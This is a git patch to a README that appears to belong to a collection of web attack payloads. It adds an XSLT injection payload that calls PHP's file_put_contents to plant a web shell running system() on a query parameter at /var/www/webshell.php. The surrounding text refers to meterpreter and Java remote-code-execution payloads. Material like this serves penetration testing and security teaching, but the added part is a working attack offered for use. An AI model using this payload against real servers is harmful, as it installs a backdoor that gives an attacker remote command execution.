From 85310ba8e5ce341981951e02f7da96a1c4e9f569 Mon Sep 17 00:00:00 2001
From: idealphase <mynameisphase@gmail.com>
Date: Sat, 28 Oct 2023 19:47:25 +0700
Subject: [PATCH] Update README.md (XSLT Injection)

Added Execute a remote php file using `file_put_contents`
---
 XSLT Injection/README.md | 12 +++++++++++-
 1 file changed, 11 insertions(+), 1 deletion(-)

diff --git a/XSLT Injection/README.md b/XSLT Injection/README.md
index 45e82ff..90e33de 100644
--- a/XSLT Injection/README.md	
+++ b/XSLT Injection/README.md	
@@ -161,6 +161,16 @@ Execute a PHP meterpreter using PHP wrapper.
 </xsl:stylesheet>
 ```
 
+Execute a remote php file using `file_put_contents`
+
+```xml
+<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" version="1.0">
+        <xsl:template match="/">
+                <xsl:value-of select="php:function('file_put_contents','/var/www/webshell.php','&lt;?php echo system($_GET[&quot;command&quot;]); ?&gt;')" />
+        </xsl:template>
+</xsl:stylesheet>
+```
+
 ### Remote Code Execution with Java
 
 ```xml
@@ -214,4 +224,4 @@ Execute a PHP meterpreter using PHP wrapper.
 
 * [From XSLT code execution to Meterpreter shells - 02 July 2012 - @agarri](https://www.agarri.fr/blog/archives/2012/07/02/from_xslt_code_execution_to_meterpreter_shells/index.html)
 * [XSLT Injection - Fortify](https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection)
-* [XSLT Injection Basics - Saxon](https://blog.hunniccyber.com/ektron-cms-remote-code-execution-xslt-transform-injection-java/)
\ No newline at end of file
+* [XSLT Injection Basics - Saxon](https://blog.hunniccyber.com/ektron-cms-remote-code-execution-xslt-transform-injection-java/)